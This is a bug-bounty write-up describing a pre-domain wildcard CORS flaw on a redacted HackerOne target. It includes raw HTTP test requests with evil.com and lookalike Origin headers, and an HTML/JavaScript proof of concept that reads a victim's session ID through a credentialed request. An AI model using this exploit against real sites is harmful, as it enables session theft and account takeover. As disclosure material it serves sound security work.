Pre-domain wildcard CORS Exploitation


Severity: High

Complexity: Medium

Weakness : Trusting Pre-domain Wildcard as Origin


  • Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted.

For example, a site which I’ll call advisor.com trusts all origins that ended in advisor.com, including definitelynotadvisor.com

  • Following are the Test Cases tried for finding predomain wildcard weakness :

Calling it as REDACTED.COM since it is private program on Hackerone.


* TEST 1 :
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com

* Response :
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://redacted.com
Access-Control-Max-Age: 3600

Test 2 :
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evil.com

* Response :
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 3:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com.evil.com
* Response :
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 4:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://connect.redacted.com.evil.com
* Response :
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 5:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evilredacted.com
* Response :
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://evilredacted.com
Access-Control-Max-Age: 3600
  • From Test 5 it is clear that application is Just Verifying Origin By Checking If it Ends with redacted.com
  • (ACAH) Along with Different Methods are Also Enabled , This Means Attacker Can Make different Request’s Behalf of the Victim .
  • To Successfully Exploit this We Need *redacted.com domain
  • So , I Went to Bought it kiraakredacted.com to exploit it

  • Exploitation :

Now it’s time to find Good Exploitation Endpoint to demonstrate & Increase the Impact.There was nothing much on connect.redacted.com to exploit just like static site asking to install their browser extension .

But one thing kept my MINDSET to find some exploitation path is that to install that extension you need to be logged in . I doubted they were storing some information somewhere . So I Started bruteforcing , Reading docs for API Endpoints . And came across https://connect.redacted.com/v1/user which contain’s the user detail’s along with SESSIONID in json response .

<html>
<body>
<button type='button' onclick='cors()'>xxx</button>
<p id='demo'></p>
<p id='session'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
parsed = JSON.stringify(this.responseText);
var arr = [];
for(var x in parsed){
arr.push(parsed[x]);
}
console.log(arr)
document.getElementById(‘session’).innerHTML = arr[13];
}
};
xhttp.open("GET", "https://connect.redacted.com/v1/user", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
Response
  • Able to Takeover user account’s remotely.